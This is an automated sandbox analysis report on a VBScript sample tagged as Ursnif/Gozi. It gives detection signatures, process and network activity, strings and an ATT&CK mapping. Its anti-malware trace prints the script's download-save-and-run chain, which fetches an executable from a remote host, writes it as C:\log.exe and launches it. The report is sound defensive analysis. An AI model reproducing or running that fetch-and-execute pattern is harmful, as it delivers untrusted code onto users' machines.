Windows Analysis Report
Informazion.vbs

Overview

General Information

Sample Name: Informazion.vbs
Analysis ID: 783911
MD5: 63a02673549906ceb1945b6503e586e2
SHA1: 1699cc8e7a12a5c26f69d8157ddc05bf7926fca0
SHA256: ecaaf6651becfa0901ce06fcb3ec0f933233cec66f41ab680ff42d1d9ffd06e2
Tags: agenziaentrate, gozi, isfb, testing, ursnif, vbs

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Potential malicious VBS script found (has network functionality)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • wscript.exe (PID: 4180 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Informazion.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • log.exe (PID: 1836 cmdline: "C:\log.exe" MD5: AEB47B393079D8C92169F1EF88DD5696)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: Informazion.vbsVirustotal: Detection: 15%
Source: unknownHTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.3:49699 version: TLS 1.2
Source: C:\log.exeCode function: 1_2_00BD8B60 GetWindowsDirectoryA,_strlen,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,1_2_00BD8B60
Source: C:\log.exeCode function: 1_2_00C04B20 FindFirstFileA,FindClose,1_2_00C04B20
Source: C:\log.exeCode function: 1_2_00C68F62 FindFirstFileExW,1_2_00C68F62
Source: C:\log.exeCode function: 1_2_00C69013 FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00C69013
Source: C:\log.exeCode function: 4x nop then movzx ebp, byte ptr [edi]1_2_00C1A060
Source: C:\log.exeCode function: 4x nop then push ecx1_2_00C141F0
Source: C:\log.exeCode function: 4x nop then mov ecx, ebp1_2_00C202F0
Source: C:\log.exeCode function: 4x nop then push ecx1_2_00BE8420
Source: C:\log.exeCode function: 4x nop then push 00000001h1_2_00BFC7D0
Source: C:\log.exeCode function: 4x nop then push ebx1_2_00C32730
Source: C:\log.exeCode function: 4x nop then sub edx, 01h1_2_00BCA8D0
Source: C:\log.exeCode function: 4x nop then mov dword ptr [esp+0Ch], edx1_2_00C2E800
Source: C:\log.exeCode function: 4x nop then mov byte ptr [eax+esi*4+07h], 00000004h1_2_00BB4877
Source: C:\log.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+ebp]1_2_00C2C9F0
Source: C:\log.exeCode function: 4x nop then mov eax, dword ptr [esi+08h]1_2_00BCC97D
Source: C:\log.exeCode function: 4x nop then mov edx, dword ptr [edi+ebx*4]1_2_00BBE970
Source: C:\log.exeCode function: 4x nop then mov edi, edx1_2_00C18A20
Source: C:\log.exeCode function: 4x nop then mov ecx, dword ptr [edi+04h]1_2_00C18B40
Source: C:\log.exeCode function: 4x nop then mov ecx, dword ptr [esp+eax*8]1_2_00C3CDF0
Source: C:\log.exeCode function: 4x nop then sub esi, 03h1_2_00C20FC0
Source: C:\log.exeCode function: 4x nop then mov eax, dword ptr [edi+ebp*4+04h]1_2_00BD2FA0
Source: C:\log.exeCode function: 4x nop then cmp byte ptr [edi+ebx], 0000002Ch1_2_00BFCF40
Source: C:\log.exeCode function: 4x nop then mov ecx, dword ptr [eax-08h]1_2_00BD50A0
Source: C:\log.exeCode function: 4x nop then movzx ebx, word ptr [ecx+edx*2]1_2_00C350F0
Source: C:\log.exeCode function: 4x nop then push dword ptr [edi+10h]1_2_00C130B0
Source: C:\log.exeCode function: 4x nop then mov ecx, edx1_2_00BEB030
Source: C:\log.exeCode function: 4x nop then mov esi, 00000000h1_2_00C1F1E0

Networking

Source: C:\Windows\System32\wscript.exeDomain query: the.earth.li
Source: C:\Windows\System32\wscript.exeNetwork Connect: 93.93.131.124 443
Source: Initial file: .write xHttp.responseBody
Source: Initial file: .savetofile Fileopen, 2
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox ViewIP Address: 93.93.131.124 93.93.131.124
Source: global trafficHTTP traffic detected: GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: the.earth.liConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /~sgtatham/putty/0.78/w32/putty.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: the.earth.liConnection: Keep-Alive
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wscript.exe, 00000000.00000003.263625121.0000023B7B775000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.263369167.0000023B7B76C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264712055.0000023B7B776000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.262118520.0000023B7B76B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
Source: wscript.exe, 00000000.00000003.261760989.0000023B7920F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.259955317.0000023B79202000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264226147.0000023B79212000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.263516890.0000023B79211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: https://sectigo.com/CPS0
Source: wscript.exe, 00000000.00000003.259955317.0000023B791E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264134456.0000023B791E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://the.earth.li/
Source: wscript.exe, 00000000.00000003.259955317.0000023B791E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264134456.0000023B791E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://the.earth.li/U
Source: wscript.exe, 00000000.00000003.263625121.0000023B7B7A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://the.earth.li/~sgtatham/putty/0.78/w32/putty.exe
Source: wscript.exe, 00000000.00000002.264299976.0000023B793E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264497492.0000023B7AEA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264497492.0000023B7AEA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.262004458.0000023B79172000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261886523.0000023B79165000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.263066389.0000023B7B165000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261715375.0000023B791BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264039206.0000023B79173000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264058897.0000023B791BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.263997397.0000023B79148000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264027516.0000023B79167000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264134456.0000023B791E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.263298778.0000023B791BD000.00000004.00000020.00020000.00000000.sdmp, Informazion.vbsString found in binary or memory: https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.262590206.0000023B7B860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BD22000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260156905.0000023B7BD22000.00000004.00000020.00020000.00000000.sdmp, log.exe, log.exe, 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp, log.exe, 00000001.00000003.260463652.0000000003081000.00000004.00000020.00020000.00000000.sdmp, log.exe, 00000001.00000000.259191390.0000000000C77000.00000002.00000001.01000000.00000007.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: wscript.exe, 00000000.00000003.257357847.0000023B7BB6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.260960954.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261309380.0000023B7BDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264864933.0000023B7BDD9000.00000004.00000020.00020000.00000000.sdmp, log.exe.0.dr, putty[1].exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: wscript.exe, 00000000.00000003.262590206.0000023B7B860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/host/:/0123456789abcdefghijklmnopqrstuvwxyzABCDEF
Source: unknownDNS traffic detected: queries for: the.earth.li
Source: C:\log.exeCode function: 1_2_00BE66A0 recv,accept,WSAGetLastError,closesocket,recv,ioctlsocket,WSAGetLastError,recv,WSAGetLastError,1_2_00BE66A0
Source: C:\log.exeCode function: 1_2_00BBA910 GetKeyboardState,1_2_00BBA910
Source: C:\log.exeCode function: 1_2_00BB60F0 GlobalAlloc,GlobalLock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,SendMessageA,GlobalFree,1_2_00BB60F0
Source: C:\log.exeCode function: String function: 00BEE7A0 appears 46 times
Source: C:\log.exeCode function: String function: 00C60D80 appears 56 times
Source: C:\log.exeCode function: String function: 00C5D413 appears 306 times
Source: C:\log.exeCode function: String function: 00BE8630 appears 244 times
Source: C:\log.exeCode function: String function: 00BE3820 appears 149 times
Source: C:\log.exeCode function: String function: 00BB69A0 appears 33 times
Source: Informazion.vbsInitial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Informazion.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\log.exe "C:\log.exe"
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4
Source: classification engineClassification label: mal76.evad.winVBS@3/2@1/1
Source: C:\log.exeCode function: 1_2_00BD4230 CoCreateInstance,1_2_00BD4230
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\log.exeCode function: 1_2_00BECC90 FormatMessageA,_strlen,GetLastError,1_2_00BECC90
Source: C:\log.exeCode function: 1_2_00BBB1F0 FindResourceA,1_2_00BBB1F0
Source: log.exeString found in binary or memory: config-serial-stopbits
Source: log.exeString found in binary or memory: source-address
Source: log.exeString found in binary or memory: config-ssh-portfwd-address-family
Source: log.exeString found in binary or memory: config-address-family
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\log.exeWindow detected: Number of UI elements: 20

Data Obfuscation

Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Environment("Process");IWshEnvironment.Item("%systemroot%\\System32\\LogFiles\\");_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("\log.exe", "2");IWshShell3.Run("\log.exe", "1")
Source: putty[1].exe.0.drStatic PE information: section name: .00cfg
Source: putty[1].exe.0.drStatic PE information: section name: .voltbl
Source: log.exe.0.drStatic PE information: section name: .00cfg
Source: log.exe.0.drStatic PE information: section name: .voltbl
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\putty[1].exe
Source: C:\Windows\System32\wscript.exeFile created: C:\log.exe
Source: C:\log.exeCode function: 1_2_00BB82E0 IsIconic,SetWindowTextW,SetWindowTextA,1_2_00BB82E0
Source: C:\log.exeCode function: 1_2_00BB8230 IsIconic,SetWindowTextW,SetWindowTextA,1_2_00BB8230
Source: C:\log.exeCode function: 1_2_00BB8390 IsIconic,ShowWindow,1_2_00BB8390
Source: C:\log.exeCode function: 1_2_00BB46E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoInitialize,MessageBoxA,1_2_00BB46E0
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\log.exeAPI coverage: 6.4 %
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: wscript.exe, 00000000.00000003.259955317.0000023B79202000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.263516890.0000023B7922C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.261760989.0000023B7922C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.259955317.0000023B7922C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264134456.0000023B79202000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264226147.0000023B7922C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.259955317.0000023B791E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.264134456.0000023B791E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW R
Source: wscript.exe, 00000000.00000002.264948145.0000023B7BDF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000000.00000002.264948145.0000023B7BDF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\log.exeCode function: 1_2_00C6413D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00C6413D
Source: C:\log.exeCode function: 1_2_00C62FF1 GetProcessHeap,1_2_00C62FF1
Source: C:\log.exeCode function: 1_2_00C5A4B2 mov ecx, dword ptr fs:[00000030h]1_2_00C5A4B2
Source: C:\log.exeCode function: 1_2_00C4E51E SetUnhandledExceptionFilter,1_2_00C4E51E
Source: C:\log.exeCode function: 1_2_00C4E52A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00C4E52A

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exeFile created: putty[1].exe.0.dr
Source: C:\log.exeCode function: 1_2_00BEC480 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorDacl,GetLastError,LocalFree,LocalFree,1_2_00BEC480
Source: C:\log.exeCode function: 1_2_00BEC620 DeleteObject,AllocateAndInitializeSid,AllocateAndInitializeSid,GetLastError,GetLastError,GetLastError,1_2_00BEC620
Source: C:\log.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_00C6828B
Source: C:\log.exeCode function: EnumSystemLocalesW,1_2_00C684E1
Source: C:\log.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_00C6857C
Source: C:\log.exeCode function: EnumSystemLocalesW,1_2_00C687CF
Source: C:\log.exeCode function: GetLocaleInfoW,1_2_00C62787
Source: C:\log.exeCode function: GetDesktopWindow,GetClientRect,CreateWindowExW,GetLastError,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetWindowRect,GetClientRect,SetWindowPos,CreateBitmap,CreateCaret,SetScrollInfo,GetDoubleClickTime,GetSystemMenu,CreatePopupMenu,AppendMenuA,AppendMenuA,AppendMenuA,CreateMenu,DeleteMenu,DeleteMenu,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,GetKeyboardLayout,GetLocaleInfoA,ShowWindow,SetForegroundWindow,GetForegroundWindow,UpdateWindow,PeekMessageW,IsWindow,PeekMessageA,GetForegroundWindow,MsgWaitForMultipleObjects,DispatchMessageW,PeekMessageW,IsWindow,IsDialogMessageA,1_2_00BB4877
Source: C:\log.exeCode function: GetLocaleInfoW,1_2_00C6882E
Source: C:\log.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_00C689F5
Source: C:\log.exeCode function: GetLocaleInfoW,1_2_00C6894E
Source: C:\log.exeCode function: EnumSystemLocalesW,1_2_00C68903
Source: C:\log.exeCode function: GetLocaleInfoW,1_2_00C68AFB
Source: C:\log.exeCode function: EnumSystemLocalesW,1_2_00C62ED5
Source: C:\log.exeCode function: 1_2_00C3E0B0 cpuid 1_2_00C3E0B0
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\log.exeCode function: 1_2_00C3EF00 ___from_strstr_to_strchr,CreateNamedPipeA,CreateEventA,GetLastError,1_2_00C3EF00
Source: C:\log.exeCode function: 1_2_00C4E3DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00C4E3DC
Source: C:\log.exeCode function: 1_2_00BECBA0 GetVersionExA,GetProcAddress,1_2_00BECBA0
Source: C:\log.exeCode function: 1_2_00C169E0 GetProcAddress,___from_strstr_to_strchr,GetUserNameA,GetUserNameA,1_2_00C169E0
Source: C:\log.exeCode function: 1_2_00BE6250 socket,SetHandleInformation,_strncpy,setsockopt,inet_addr,htonl,htonl,getaddrinfo,htons,htons,bind,listen,closesocket,WSAGetLastError,closesocket,closesocket,WSAGetLastError,1_2_00BE6250
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 2 Command and Scripting Interpreter | Path Interception | 112 Process Injection | 1 Masquerading | 11 Input Capture | 1 System Time Discovery | Remote Services | 11 Input Capture | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | 221 Scripting | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 112 Process Injection | LSASS Memory | 21 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 2 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
